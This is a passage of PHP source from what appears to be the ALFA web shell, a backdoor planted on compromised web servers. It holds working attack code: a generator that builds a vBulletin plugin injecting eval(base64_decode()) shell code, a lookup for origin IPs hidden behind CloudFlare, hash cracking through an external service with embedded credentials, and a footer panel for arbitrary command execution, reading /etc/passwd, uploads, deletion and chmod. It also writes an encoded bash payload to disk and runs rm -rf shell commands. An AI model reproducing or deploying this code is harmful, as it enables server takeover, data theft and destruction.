2688else
2689echo "\n[+] CloudFlare wasn't detected, proceeding anyway.\n";
2690echo '[+] CloudFlare IP: ' . is_ipv4(gethostbyname($url)) . "\n\n<br><br>";
2691echo "[+] Searching for more IP addresses.\n\n<br><br>";
2692for($x=0;$x<count($subs);$x++){
2693$site = $subs[$x] . $url;
2694$ip = is_ipv4(gethostbyname($site));
2695if($ip == '(Null)')
2696continue;
2697echo "Trying {$site}: {$ip}\n<br>";
2698}
2699echo "\n[+] Finished.\n<br>";
2700}
2701echo '</div>';
2702alfafooter();
2703}
2704function is_ipv4($ip){
2705return filter_var($ip, FILTER_VALIDATE_IP, FILTER_FLAG_IPV4) ? $ip : '(Null)';
2706}
2707function __alert($s){
2708echo '<center>'.__pre().$s.'</center>';
2709}
2710function create_table($data){
2711echo '<table border="1">';
2712foreach ($data as $key => $val){
2713$array = array();
2714foreach($val as $k => $v){
2715$array[$k] = $v;
2716}
2717echo "<tr><td><div class='tbltxt'>".$array['tdName']."</div></td><td><input type='text' id='".$array['id']."' name='".$array['inputName']."' ".($array['placeholder']?'placeholder':'value')."='".$array['inputValue']."' size='".$array['inputSize']."' ".($array['disabled']?'disabled':'')."></td></tr>";
2718}
2719echo '</table>';
2720}
2721function alfaphp2xml(){
2722alfahead();
2723AlfaNum(8,9,10,7,6,5,4,3);
2724echo "<div class=header><center><p><div class='txtfont_header'>| Shell For vBulletin |</div></p><form onsubmit=\"g('php2xml',null,this.code.value,'>>'); return false;\" method='post'>
2725<p><br><textarea rows='12' cols='70' type='text' name='code' placeholder=\"insert your shell code\"></textarea><br/><br/>
2726<input type='submit' name='go' value=' ' /></p></form></center>";
2727if($_POST['alfa2']&&$_POST['alfa2']=='>>'){
2728echo __pre()."<p><center><textarea rows='10' name='users' cols='80'>";
2729echo '<?xml version="1.0" encoding="ISO-8859-1"?><plugins><plugin active="1" product="vbulletin"><title>vBulletin</title><hookname>init_startup</hookname><phpcode><![CDATA[if (strpos($_SERVER[\'PHP_SELF\'],"subscriptions.php")){eval(base64_decode(\''.__ZW5jb2Rlcg($_POST['alfa1']).'\'));exit;}]]></phpcode></plugin></plugins>';
2730echo '</textarea></center></p>';
2731}
2732echo '</center></div>';
2733alfafooter();
2734}
2735function alfacpcrack(){
2736alfahead();
2737echo '<div class=header><center><p><div class="txtfont_header">| Hash Tools |</div></p><h3><a href=javascript:void(0) onclick="g(\'cpcrack\',null,\'dec\')">| DeCrypter | </a><a href=javascript:void(0) onclick="g(\'cpcrack\',null,\'analyzer\')">| Hash Analyzer | </a></h3></center>';
2738if($_POST['alfa1']=='dec'){
2739$algorithms = array('md5'=>'MD5','md4'=>'MD4','sha1'=>'SHA1','sha256'=>'SHA256','sha384'=>'SHA384','sha512'=>'SHA512','ntlm'=>'NTLM');
2740echo '<center><div class="txtfont_header">| DeCrypter |</div><br><br>
2741<form onsubmit="g(\'cpcrack\',null,\'dec\',this.md5.value,\'>>\',this.alg.value); return false;"><div class="txtfont">Decrypt Method:</div> <select name="alg" style="width:100px;">';
2742foreach($algorithms as $key=>$val){echo('<option value="'.$key.'">'.$val.'</option>');}
2743echo'</select><input type="text" placeholder="Hash" name="md5" size="60" id="text" /> <input type="submit" value=" " name="go" /></form></center><br>';
2744if($_POST['alfa3'] == '>>'){
2745$hash = $_POST['alfa2'];
2746if(!empty($hash)){
2747$hash_type = $_POST['alfa4'];
2748$email = "solevisible@gmail.com";
2749$code = "7b9fa79f92c3cd96";
2750$target = "http://md5decrypt.net/Api/api.php?hash=".$hash."&hash_type=".$hash_type."&email=".$email."&code=".$code;
2751$resp = @file_get_contents($target);
2752if($resp==''){
2753$get = new AlfaCURL();
2754$resp = $get->Send($target);
2755}
2756echo __pre().'<center>';
2757switch($resp){
2758 case('CODE ERREUR : 001'):echo "<b><font color='red'>You exceeded the 400 allowed request per day</font></b>";break;
2759 case('CODE ERREUR : 003'):echo "<b><font color='red'>Your request includes more than 400 hashes.</font></b>";break;
2760 case('CODE ERREUR : 004'):echo "<b><font color='red'>The type of hash you provide in the argument hash_type doesn't seem to be valid</font></b>";break;
2761 case('CODE ERREUR : 005'):echo "<b><font color='red'>The hash you provide doesn't seem to match with the type of hash you set.</font></b>";break;
2762}
2763if(substr($resp,0,4)!='CODE'&&$resp!=''){
2764echo "<b>Result: <font color='green'>".$resp."</font></b>";
2765}elseif(substr($resp,0,4)!='CODE'){
2766echo "<font color='red'>NoT Found</font><br />";
2767}
2768echo('</center>');
2769}
2770}
2771}
2772if($_POST['alfa1']=='analyzer'){
2773echo '<center><p><div class="txtfont_header">| Hash Analyzer |</div></p>
2774<form onsubmit="g(\'cpcrack\',null,\'analyzer\',this.hash.value,\'>>\');return false;">
2775<div class="txtfont">Hash: </div> <input type="text" placeholder="Hash" name="hash" size="60" id="text" /> <input type="submit" value=" " name="go" /></form></center><br>';
2776if($_POST['alfa3'] == '>>'){
2777$hash = $_POST['alfa2'];
2778if(!empty($hash)){
2779$curl = new AlfaCURL();
2780$resp = $curl->Send("http://md5decrypt.net/en/HashFinder/","post","hash={$hash}&crypt=Search");
2781echo(__pre().'<center>');
2782if(preg_match('#<fieldset class="trouve">(.*?)</fieldset>#',$resp,$s)){
2783 echo('<font color="green">'.$s[1].'</font>');
2784}else{
2785 echo('<font color="red">Not Found...!</font>');
2786}
2787echo('</center><br>');
2788}
2789}
2790}
2791echo '</div>';
2792alfafooter();
2793}
2794function alfafooter(){
2795if(!isset($_POST['ajax'])){
2796echo "<table class='foot' width='100%' border='0' cellspacing='3' cellpadding='0' >
2797<tr>
2798<td width='17%'><form onsubmit=\"if(this.f.value.trim().length==0)return false;editor(this.f.value,'mkfile','','','','file');this.f.value='';return false;\"><span class='footer_text'>Make File : </span><br><input class='dir' type='text' name='f' value=''> <input type='submit' value=' '></form></td>
2799<td width='21%'><form onsubmit=\"g('FilesMan',null,'mkdir',this.d.value);this.d.value='';return false;\"><span class='footer_text'>Make Dir : </span><br><input class='dir' type='text' name='d' value=' '> <input type='submit' value=' '></form></td>
2800<td width='22%'><form onsubmit=\"g('FilesMan',null,'delete',this.del.value);this.del.value='';return false;\"><span class='footer_text'>Delete : </span><br><input class='dir' type='text' name='del' value=' '> <input type='submit' value=' '></form></td>
2801<td width='19%'><form onsubmit=\"if(this.f.value.trim().length==0)return false;editor(this.f.value,'chmod','','','','none');this.f.value='';return false;\"><span class='footer_text'>Chmod : </span><br><input class='dir' type=text name=f value=' '> <input type='submit' value=' '></form></td>
2802</tr>
2803<tr>
2804<td colspan='2'><form onsubmit='g(\"FilesMan\",this.c.value,\"\");return false;'><span class='footer_text'>Change Dir : </span><br><input class='foottable' id='footer_cwd' type='text' name='c' value='".htmlspecialchars($GLOBALS['cwd'])."'> <input type='submit' value=' '></form></td>
2805<td colspan='2'><form onsubmit=\"editor(this.file.value,'auto','','','','file');return false;\"><span><span class='footer_text'>Read File : </span></span><br><input class='foottable' type='text' name='file' value='/etc/passwd'> <input type='submit' value=' '></form></td>
2806</tr>
2807<tr>
2808<td colspan='4'><form onsubmit=\"g('proc',null,this.c.value);this.c.value='';return false;\"><span><span class='footer_text'>Execute :</span><br><input class='foottable' type='text' name='c' value=' '> <input type='submit' value=' '></form></td>
2809</tr>
2810<tr>
2811<td colspan='4'><form onsubmit='u(this);return false;' name='footer_form' method='post' ENCTYPE='multipart/form-data'>
2812<input type='hidden' name='a' value='FilesMAn'>
2813<input type='hidden' name='c' value='" . $GLOBALS['cwd'] ."'>
2814<input type='hidden' name='alfa1' value='uploadFile'>
2815<input type='hidden' name='charset' value='" . (isset($_POST['charset'])?$_POST['charset']:'') . "'>
2816<span class='footer_text'>Upload file: </span><span><button id='addup' onclick='addnewup();return false;'><b>+</b></button></span><p id='pfooterup'><label class='inputfile' for='footerup'><span id='__fnameup'></span> <strong> Choose a file</strong></label><input id='footerup' class='toolsInp' type='file' name='f[]' onChange='handleup(this,0);'></p><input type='submit' name='submit' value=' '></form><br><span class='copyright'>[ ./AlfaTeam © 2012-".date('Y')." ]</span></td>
2817</tr>
2818</table>
2819</div>
2820<div id='cgiloader'><div class='editor-wrapper'><div class='editor-header'><div class='editor-controller'><div class='editor-minimize' onClick='editorMinimize(\"cgiloader\");'></div><div onClick='editorClose(\"cgiloader\");' class='close-button'></div></div></div><div id='cgiframe' style='margin-left:14px;margin-right:30px;'></div></div></div>
2821<div id='editor'><div class='editor-wrapper'><div class='editor-header'><div class='editor-path'></div><div class='editor-controller'><div class='editor-minimize' onClick='editorMinimize(\"editor\");'></div><div onClick='editorClose(\"editor\");' class='close-button'></div></div></div><div class='editor-explorer'><div class='hheader'><div class='history-clear' onclick='clearEditorHistory();'>Clear all</div><div class='hheader-text'>History</div><div class='editor-search'><input type='text' style='text-align:center;' id='search-input' placeholder='search'></div></div><div class='history-list'></div></div><div class='editor-modal'><div class='editor-body'><div class='editor-content'></div></div></div></div></div>
2822<div id='update-content'></div>
2823<div id='editor-minimized' onclick='showEditor(\"editor\");'><div class='minimized-wrapper'><div class='minimized-text'>Show Editor</div></div></div>
2824<div id='cgiloader-minimized' onclick='showEditor(\"cgiloader\");'><div class='minimized-wrapper'><div class='minimized-text'>Show Cgi</div></div></div>
2825<script>
2826 $('search-input').addEventListener('keydown', function(e){
2827 setTimeout(function(){
2828 var string = $('search-input').value
2829 d.getElementsByClassName('history-list')[0].innerHTML = '';
2830 for(var i in editor_files){
2831 if(editor_files[i].file.search(string) != -1 || string == ''){
2832 var mode = 0;
2833 if(i == editor_current_file){
2834 mode = ' is_active';
2835 }
2836 insertToHistory(i, editor_files[i].file, mode, editor_files[i].type);
2837 }
2838 }
2839 }, 100);
2840 },false);
2841 _Ajax(d.URL, 'a='+alfab64('checkupdate'), function(res){
2842 d.body.insertAdjacentHTML('beforeend', res);
2843 });
2844 if(".$GLOBALS["need_to_update_header"]."){
2845 _Ajax(d.URL, 'a='+alfab64('updateheader'), function(res){
2846 try{
2847 var data = JSON.parse(res);
2848 console.log(data);
2849 for(var i in data){
2850 var html = '';
2851 for(var b = 0; b < data[i].length; b++){
2852 if(i=='useful'||i=='downloader'){
2853 html += '<span class=\"header_values\" style=\"margin-left: 4px;\">'+data[i][b]+'</span>';
2854 }else{
2855 html += data[i][b];
2856 }
2857 }
2858 var elem = $('header_'+i);
2859 if(elem){elem.innerHTML = html;}
2860 }
2861 $('header_cgishell').innerHTML = 'ON';
2862 $('header_cgishell').setAttribute('class', 'header_on');
2863 }catch(e){console.log(e)}
2864 });
2865 }else if(islinux){
2866 _Ajax(d.URL, 'a='+alfab64('checkcgi'), function(res){
2867 if(res=='ok'){
2868 $('header_cgishell').innerHTML = 'ON';
2869 $('header_cgishell').setAttribute('class', 'header_on');
2870 }
2871 });
2872 }
2873</script>
2874</body>
2875</html>
2876";
2877}}
2878if (!function_exists("posix_getpwuid") && (strpos(@ini_get('disable_functions'), 'posix_getpwuid')===false)) {
2879function posix_getpwuid($p) {return false;} }
2880if (!function_exists("posix_getgrgid") && (strpos(@ini_get('disable_functions'), 'posix_getgrgid')===false)) {
2881function posix_getgrgid($p) {return false;} }
2882function alfaWhich($p) {
2883$path = alfaEx('which ' . $p,false,false);
2884if(!empty($path))
2885return strlen($path);
2886return false;
2887}
2888function alfaSize($s) {
2889if($s >= 1073741824)
2890return sprintf('%1.2f', $s / 1073741824 ). ' GB';
2891elseif($s >= 1048576)
2892return sprintf('%1.2f', $s / 1048576 ) . ' MB';
2893elseif($s >= 1024)
2894return sprintf('%1.2f', $s / 1024 ) . ' KB';
2895else
2896return $s . ' B';
2897}
2898function alfaPerms($p) {
2899if (($p & 0xC000) == 0xC000)$i = 's';
2900elseif (($p & 0xA000) == 0xA000)$i = 'l';
2901elseif (($p & 0x8000) == 0x8000)$i = '-';
2902elseif (($p & 0x6000) == 0x6000)$i = 'b';
2903elseif (($p & 0x4000) == 0x4000)$i = 'd';
2904elseif (($p & 0x2000) == 0x2000)$i = 'c';
2905elseif (($p & 0x1000) == 0x1000)$i = 'p';
2906else $i = 'u';
2907$i .= (($p & 0x0100) ? 'r' : '-');
2908$i .= (($p & 0x0080) ? 'w' : '-');
2909$i .= (($p & 0x0040) ? (($p & 0x0800) ? 's' : 'x' ) : (($p & 0x0800) ? 'S' : '-'));
2910$i .= (($p & 0x0020) ? 'r' : '-');
2911$i .= (($p & 0x0010) ? 'w' : '-');
2912$i .= (($p & 0x0008) ? (($p & 0x0400) ? 's' : 'x' ) : (($p & 0x0400) ? 'S' : '-'));
2913$i .= (($p & 0x0004) ? 'r' : '-');
2914$i .= (($p & 0x0002) ? 'w' : '-');
2915$i .= (($p & 0x0001) ? (($p & 0x0200) ? 't' : 'x' ) : (($p & 0x0200) ? 'T' : '-'));
2916return $i;
2917}
2918function alfaPermsColor($f,$isbash=false){
2919$class = "";
2920$num = "";
2921$human = "";
2922if($isbash){
2923$class = $f["class"];
2924$num = $f["num"];
2925$human = $f["human"];
2926}else{
2927$num = substr(sprintf('%o', @fileperms($f)),-4);
2928$human = alfaPerms(@fileperms($f));
2929if(!@is_readable($f))
2930$class = "main_red_perm";
2931elseif (!@is_writable($f))
2932$class = "main_white_perm";
2933else
2934$class = "main_green_perm";
2935}
2936return '<span style="font-weight:unset;" class="'.$class.'">'.$num.'</span><span style="font-weight:unset;" class="beetween_perms"> >> </span><span style="font-weight:unset;" class="'.$class.'">'.$human.'</span>';
2937}
2938if(!function_exists("scandir")) {
2939function scandir($dir) {
2940$dh = opendir($dir);
2941while (false !== ($filename = readdir($dh)))
2942$files[] = $filename;
2943return $files;
2944}
2945}
2946function reArrayFiles($file_post){
2947$file_ary = array();
2948$file_count = count($file_post['name']);
2949$file_keys = array_keys($file_post);
2950for ($i=0; $i<$file_count; $i++) {
2951foreach ($file_keys as $key) {
2952$file_ary[$i][$key] = $file_post[$key][$i];
2953}
2954}
2955return $file_ary;
2956}
2957function _alfa_can_runCommand($cgi=true,$cache=true){
2958 if(isset($_SESSION["alfa_canruncmd"])&&$cache){
2959 return true;
2960 }
2961 if(strlen(alfaEx("whoami",false,$cgi))>0){
2962 $_SESSION["alfa_canruncmd"] = true;
2963 return true;
2964 }
2965 return false;
2966}
2967function _alfa_symlink($target, $link){
2968 $phpsym = function_exists("symlink");
2969 if($phpsym){
2970 @symlink($target, $link);
2971 }else{
2972 alfaEx("ln -s '".addslashes($target)."' '".addslashes($link)."'");
2973 }
2974}
2975function _alfa_file_exists($file,$cgi=true){
2976 if(@file_exists($file)){
2977 return true;
2978 }else{
2979 if(strlen(alfaEx("ls -la '".addslashes($file)."'",false,$cgi))>0){
2980 return true;
2981 }
2982 }
2983 return false;
2984}
2985function _alfa_file($file,$cgi=true){
2986 $array = @file($file);
2987 if(!$array){
2988 if(strlen(alfaEx("id",false,$cgi))>0){
2989 $data = alfaEx('cat "'.addslashes($file).'"',false,$cgi);
2990 if(strlen($data)>0){
2991 return explode("\n", $data);
2992 }else{
2993 return false;
2994 }
2995 }else{
2996 return false;
2997 }
2998 }else{
2999 return $array;
3000 }
3001}
3002function _alfa_is_writable($file){
3003 $check = false;
3004 $check = @is_writable($file);
3005 if(!$check){
3006 if(_alfa_can_runCommand()){
3007 $check = alfaEx('[ -w "'.trim(addslashes($file)).'" ] && echo "yes" || echo "no"');
3008 if($check == "yes"){
3009 $check = true;
3010 }else{
3011 $check = false;
3012 }
3013 }
3014 }
3015 return $check;
3016}
3017function _alfa_is_dir($dir,$mode="-d"){
3018 $check = false;
3019 $check = @is_dir($dir);
3020 if(!$check){
3021 if(_alfa_can_runCommand()){
3022 $check = alfaEx('[ "'.trim($mode).'" "'.trim(addslashes($dir)).'" ] && echo "yes" || echo "no"');
3023 if($check == "yes"){
3024 return true;
3025 }else{
3026 return false;
3027 }
3028 }
3029 }
3030 return $check;
3031}
3032function alfaFilesMan(){
3033alfahead();
3034AlfaNum(8,9,10,7,6,5,4);
3035echo '<div class="ajaxarea"><div class="header">';
3036if(!empty ($_COOKIE['f']))
3037$_COOKIE['f'] = @unserialize($_COOKIE['f']);
3038if(!empty($_POST['alfa1'])){
3039switch($_POST['alfa1']){
3040case 'uploadFile':
3041if(isset($GLOBALS['glob_chdir_false'])){
3042 $alfa_canruncmd = _alfa_can_runCommand(true,true);
3043 $move_cmd_file = true;
3044}
3045$files = reArrayFiles($_FILES['f']);
3046foreach($files as $file){
3047if($move_cmd_file){
3048 alfaEx("cat '".addslashes($file['tmp_name'])."' > '".addslashes($_POST["c"]."/".$file['name'])."'");
3049}else{
3050 @move_uploaded_file($file['tmp_name'],$file['name']);
3051}
3052echo "uped...!<Br>";
3053}
3054break;
3055case 'mkdir':
3056$new_dir_cmd = false;
3057if(isset($GLOBALS['glob_chdir_false'])){
3058 if(_alfa_can_runCommand(true,true)){
3059 alfaEx("cd '".trim(addslashes($_POST['c']))."';mkdir '".trim(addslashes($_POST['alfa2']))."'");
3060 }
3061}else{
3062if(!@mkdir(trim($_POST['alfa2'])))
3063echo "<b><font color='red'>Can't create new dir !</b></font>";
3064}
3065break;
3066case 'delete':
3067function deleteDir($path){
3068$path = (substr($path,-1)=='/') ? $path:$path.'/';
3069$dh = @opendir($path);
3070while(($item = @readdir($dh)) !== false){
3071$item = $path.$item;
3072if((basename($item) == "..") || (basename($item) == "."))
3073continue;
3074$type = @filetype($item);
3075if ($type == "dir")
3076deleteDir($item);
3077else
3078@unlink($item);
3079}
3080@closedir($dh);
3081@rmdir($path);
3082}
3083if(is_array(@$_POST['f']))
3084foreach($_POST['f'] as $f){
3085if($f == '..')
3086continue;
3087$f = rawurldecode($f);
3088if(isset($GLOBALS["glob_chdir_false"])){
3089 if(_alfa_can_runCommand(true,true)){
3090 alfaEx("rm -rf '".addslashes($_POST['c'].'/'.$f)."'");
3091 }
3092}else{
3093alfaEx("rm -rf '".addslashes($f)."'",false,false);
3094if(@is_dir($f))
3095deleteDir($f);
3096else
3097@unlink($f);
3098}
3099}
3100if(@is_dir(rawurldecode(@$_POST['alfa2']))&&rawurldecode(@$_POST['alfa2'])!='..'){
3101deleteDir(rawurldecode(@$_POST['alfa2']));
3102alfaEx("rm -rf '".addslashes($_POST['alfa2'])."'",false,false);
3103}else{
3104@unlink(rawurldecode(@$_POST['alfa2']));
3105}
3106if(isset($GLOBALS["glob_chdir_false"])){
3107 $source = rawurldecode(@$_POST['alfa2']);
3108 if($source!='..'&&!empty($source)){
3109 if(_alfa_can_runCommand(true,true)){
3110 alfaEx("cd '".trim(addslashes($_POST['c']))."';rm -rf '".addslashes($source)."'");
3111 }
3112 }
3113}
3114break;
3115case 'paste':
3116if($_SESSION['act'] == 'copy'&&isset($_SESSION['f'])){
3117function copy_paste($c,$s,$d){
3118if(@is_dir($c.$s)){
3119@mkdir($d.$s);
3120$h = @opendir($c.$s);
3121while (($f = @readdir($h)) !== false)
3122if (($f != ".") and ($f != ".."))
3123copy_paste($c.$s.'/',$f, $d.$s.'/');
3124} elseif(is_file($c.$s))
3125@copy($c.$s, $d.$s);
3126}
3127foreach($_SESSION['f'] as $f)
3128copy_paste($_SESSION['c'],$f, $GLOBALS['cwd']);
3129}elseif($_SESSION['act'] == 'move'&&isset($_SESSION['f'])){
3130function move_paste($c,$s,$d){
3131if(@is_dir($c.$s)){
3132@mkdir($d.$s);
3133$h = @opendir($c.$s);
3134while (($f = @readdir($h)) !== false)
3135if(($f != ".") and ($f != ".."))
3136copy_paste($c.$s.'/',$f, $d.$s.'/');
3137}elseif(@is_file($c.$s))
3138@copy($c.$s, $d.$s);
3139}
3140foreach($_SESSION['f'] as $f)
3141@rename($_SESSION['c'].$f, $GLOBALS['cwd'].$f);
3142}elseif($_SESSION['act'] == 'zip'&&isset($_SESSION['f'])){
3143if(class_exists('ZipArchive')){
3144$zip = new ZipArchive();
3145$zipX = "alfa_".rand(1,1000).".zip";
3146if($zip->open($zipX, 1)){
3147@chdir($_SESSION['c']);
3148foreach($_SESSION['f'] as $f){
3149if($f == '..')continue;
3150if(@is_file($_SESSION['c'].$f))
3151$zip->addFile($_SESSION['c'].$f, $f);
3152elseif(@is_dir($_SESSION['c'].$f)){
3153$iterator = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($f.'/'));
3154foreach($iterator as $key=>$value){
3155$key = str_replace('\\','/',realpath($key));
3156if(@is_dir($key)){
3157if(in_array(substr($key, strrpos($key,'/')+1),array('.', '..')))continue;
3158}else{$zip->addFile($key,$key);}}}}
3159@chdir($GLOBALS['cwd']);
3160$zip->close();
3161__alert('>> '.$zipX.' << is created...');}}
3162}elseif($_SESSION['act'] == 'unzip'&&isset($_SESSION['f'])){
3163if(class_exists('ZipArchive')){
3164$zip = new ZipArchive();
3165foreach($_SESSION['f'] as $f) {
3166if($zip->open($_SESSION['c'].$f)){
3167$zip->extractTo($GLOBALS['cwd']);
3168$zip->close();}}}}
3169unset($_SESSION['f']);
3170break;
3171default:
3172if(!empty($_POST['alfa1'])){
3173$_SESSION['act'] = @$_POST['alfa1'];
3174$_SESSION['f'] = @$_POST['f'];
3175$_SESSION['c'] = @$_POST['c'];
3176}
3177break;
3178}
3179}
3180if(isset($_SESSION[__LAST_CWD__]) && !isset($_POST['c']) && $_SESSION[__LAST_CWD__] != ''){
3181 $dirContent = @scandir($_SESSION[__LAST_CWD__]);
3182}else{
3183 $dirContent = @scandir(isset($_POST['c'])?$_POST['c']:$GLOBALS['cwd']);
3184 if(preg_match("#(.*)\/\.\.#", $_POST['c'], $res)){
3185 $path = explode('/', $res[1]);
3186 array_pop($path);
3187 $_POST['c'] = implode('/', $path);
3188 }
3189 $_SESSION[__LAST_CWD__] = str_replace(array("..","//"), array("","/"), $_POST['c']);
3190}
3191$cmd_dir = false;
3192if($dirContent === false){
3193 if(_alfa_can_runCommand(true,true)){
3194 @chdir(dirname($_SERVER["SCRIPT_FILENAME"]));
3195 if(!isset($_SESSION["alfachdir_bash"])||@!file_exists("alfacgiapi/getdir.alfa")){
3196 $bash = "jZNvb5swEMZfw6e4eaZppaIk3Z9INLyYNHXq2017UYWocsEEa2AjQ5SxNN99PmMIlTJpEVLOv+fu8Rkf79/N942evwg5bwr/6+P3mC79x4cfMZ0lcubztFBANsTPlQYBQgK9LhsIGYThTqt9HWZC87RVWvAmzIVuWqDG5eYeMuWD+dWsLWKCbE4F8T0hcxXT66ZlLYQpkOAhCn5GwbcoaKLgKVoELAq+EKBYd+N72MosmoHmLINQ485Ma9bBer0GQtHNmLZdzWN6tMpmsT3ZndVBcj3SpaO265HeGeo14s+5+gOSSmUi70b20dXWXFdyX43804QX+4rJUfmMLiKHzcacpK+COAayWK5WKwLb7T20BZe+5w2eZIGKA70ZyfTht30Mz8VgGB7MwfH1oA9cXVmmJ+yNd6pKpWNSMSGfd5pz+YzUGPLS2f1X6aEQLT+XNvxCjubZkHHuluLd2LMPk9K92cheHWqTls41mu/2JdOQi5Lb476+Xk7gVd12/05ruupFlSKFUshfF/a3hX3bduSPCZGs4gmJIDFTlpBb84+pjvQhQjtljroYsR0zh12MGEfN0T5E2E+bw8MCBTcbThlXg2SnZCK69SDbq5nIbn269TMlufu0j6ct+Qs=";
3197 alfaWriteTocgiapi("getdir.alfa",$bash);
3198 }
3199 if(empty($_SESSION[__LAST_CWD__]))$_SESSION[__LAST_CWD__] = "/";
3200 $dirContent = alfaEx("cd alfacgiapi;sh getdir.alfa '".addslashes($_SESSION[__LAST_CWD__])."'");
3201 $dirContent = json_decode($dirContent, true);
3202 if(is_array($dirContent)){
3203 array_pop($dirContent);
3204 $cmd_dir = true;
3205 }else{
3206 $dirContent = false;
3207 }
3208 $_SESSION["alfachdir_bash"] = true;
3209 }
3210}
3211if($dirContent == false){
3212echo '<center><br><span style="font-size:16px;"><span style="color: red; -webkit-text-shadow: 1px 1px 13px;"><strong><b><big>!!! Access Denied !!!</b></big><br><br></strong></div>';
3213alfaFooter();
3214return;
3215}
3216global $sort;
3217$sort = array('name', 1);
3218if(!empty($_POST['alfa1'])) {
3219if(preg_match('!s_([A-z]+)_(\d{1})!', $_POST['alfa1'], $match))
3220$sort = array($match[1], (int)$match[2]);
3221}
3222echo "<form onsubmit='fc(this);return false;' name='files' method='post'><table width='100%' class='main' cellspacing='0' cellpadding='2'><tr><th width='13px'><div class='myCheckbox' style='padding-left:0px;'><input type='checkbox' id='mchk' onclick='checkBox();' class='chkbx'><label for='mchk'></label></div></th><th>Name</th><th>Size</th><th>Modify</th><th>Owner/Group</th><th>Permissions</th><th>Actions</th></tr>";
3223$dirs = $files = array();
3224$n = count($dirContent);
3225for($i=0;$i<$n;$i++){
3226if($cmd_dir){
3227$filename = $dirContent[$i]["name"];
3228$file_owner = $dirContent[$i]["owner"];
3229$file_group = $dirContent[$i]["group"];
3230$file_modify = @date('Y-m-d H:i:s', $dirContent[$i]["modify"]);
3231$file_perm = alfaPermsColor(array("class"=>$dirContent[$i]["permcolor"],"num"=>$dirContent[$i]["permnum"],"human"=>$dirContent[$i]["permhuman"]),true);
3232$file_size = $dirContent[$i]["size"];
3233$file_path = $_SESSION[__LAST_CWD__]."/".$dirContent[$i]["name"];
3234}else{
3235$filename = $dirContent[$i];
3236$ow = function_exists("posix_getpwuid")&&function_exists("fileowner")?@posix_getpwuid(@fileowner($GLOBALS['cwd'].$filename)):array("name" => "????");
3237$gr = function_exists("posix_getgrgid")&&function_exists("filegroup")?@posix_getgrgid(@filegroup($GLOBALS['cwd'].$filename)):array("name" => "????");
3238$file_owner = $ow['name']?$ow['name']:(function_exists("fileowner")?@fileowner($GLOBALS['cwd'].$filename):"????");
3239$file_group = $gr['name']?$gr['name']:(function_exists("filegroup")?@filegroup($GLOBALS['cwd'].$filename):"????");
3240$file_modify = @date('Y-m-d H:i:s', @filemtime($GLOBALS['cwd'] . $filename));
3241$file_perm = alfaPermsColor($GLOBALS['cwd'].$filename);
3242$file_size = @filesize($GLOBALS['cwd'].$filename);
3243$file_path = $GLOBALS['cwd'].$filename;
3244}
3245$tmp = array('name' => $filename,
3246'path' => $file_path,
3247'modify' => $file_modify,
3248'perms' => $file_perm,
3249'size' => $file_size,
3250'owner' => $file_owner,
3251'group' => $file_group
3252);
3253if(!$cmd_dir){
3254if(@is_file($file_path))
3255$files[] = array_merge($tmp, array('type' => 'file'));
3256elseif(@is_link($file_path))
3257$dirs[] = array_merge($tmp, array('type' => 'link', 'link' => readlink($tmp['path'])));
3258elseif(@is_dir($file_path)&& ($filename != "."))
3259$dirs[] = array_merge($tmp, array('type' => 'dir'));
3260}else{
3261 if($dirContent[$i]["type"]=="file"){
3262 $files[] = array_merge($tmp, array('type' => 'file'));
3263 }else{
3264 if($dirContent[$i]["name"] != "."){
3265 $dirs[] = array_merge($tmp, array('type' => 'dir'));
3266 }
3267 }
3268}
3269}
3270$GLOBALS['sort'] = $sort;
3271function alfaCmp($a, $b) {
3272if($GLOBALS['sort'][0] != 'size')
3273return strcmp(strtolower($a[$GLOBALS['sort'][0]]), strtolower($b[$GLOBALS['sort'][0]]))*($GLOBALS['sort'][1]?1:-1);
3274else
3275return (($a['size'] < $b['size']) ? -1 : 1)*($GLOBALS['sort'][1]?1:-1);
3276}
3277usort($files, "alfaCmp");
3278usort($dirs, "alfaCmp");
3279$files = array_merge($dirs, $files);
3280$l=0;
3281$cc=0;
3282foreach($files as $f){
3283$f['name'] = htmlspecialchars($f['name']);
3284$newname = mb_strlen($f['name'], 'UTF-8')>60?mb_substr($f['name'], 0, 60, 'utf-8').'...':$f['name'];
3285$checkbox = 'checkbox'.$cc;
3286$raw_name = rawurlencode($f['name']);
3287$icon = $GLOBALS['DB_NAME']['show_icons']?'<img src="'.findicon($f['name'],$f['type']).'" width="30" height="30">':'';
3288$style = $GLOBALS['DB_NAME']['show_icons']?'position:relative;display:inline-block;bottom:12px;':'';
3289echo '<tr'.($l?' class=l1':'').'><td><div class="myCheckbox"><input type="checkbox" name="f[]" value="'.$raw_name.'" class="chkbx" id="'.$checkbox .'"><label for="'.$checkbox .'"></label></div></td><td>'.$icon.'<div style="'.$style.'"><a class="main_name" href=javascript:void(0) onclick="'.(($f['type']=='file')?'editor(\''.$raw_name.'\',\'auto\',\'\',\'\',\'\',\''.$f['type'].'\');">'.($GLOBALS['cwd'].$f['name']==$GLOBALS['__file_path']?"<span class='shell_name' style='font-weight:unset;'>".$f['name']."</span>":htmlspecialchars($newname)):'g(\'FilesMan\',\''.$f['path'].'\');" title=' . $f['link'] . '><b>| ' . htmlspecialchars($f['name']) . ' |</b>').'</a></td></div><td><span style="font-weight:unset;" class="main_size">'.(($f['type']=='file')?alfaSize($f['size']):$f['type']).'</span></td><td><span style="font-weight:unset;" class="main_modify">'.$f['modify'].'</span></td><td><span style="font-weight:unset;" class="main_owner_group">'.$f['owner'].'/'.$f['group'].'</span></td><td><a href=javascript:void(0) onclick="editor(\''.$raw_name.'\',\'chmod\',\'\',\'\',\'\',\''.$f['type'].'\')">'.
3290$f['perms'].'</td><td><a class="actions" href="javascript:void(0);" onclick="editor(\''.$raw_name.'\', \'rename\',\'\',\'\',\'\',\''.$f['type'].'\')">R</a> <a class="actions" href="javascript:void(0);" onclick="editor(\''.$raw_name.'\', \'touch\',\'\',\'\',\'\',\''.$f['type'].'\')">T</a>'.(($f['type']=='file')?' <a class="actions" href="javascript:void(0);" onclick="editor(\''.$raw_name.'\', \'edit\',\'\',\'\',\'\',\''.$f['type'].'\')">E</a> <a class="actions" href="javascript:void(0);" onclick="g(\'FilesTools\',null,\''.$raw_name.'\', \'download\')">D</a>':'').'<a class="actions" href="javascript:void(0);" onclick="var chk = confirm(\'Are You Sure For Delete # '.addslashes(rawurldecode($f['name'])).' # ?\'); chk ? g(\'FilesMan\',null,\'delete\', \''.$raw_name.'\') : \'\';"> X </a></td></tr>';
3291$l = $l?0:1;
3292$cc++;
3293}
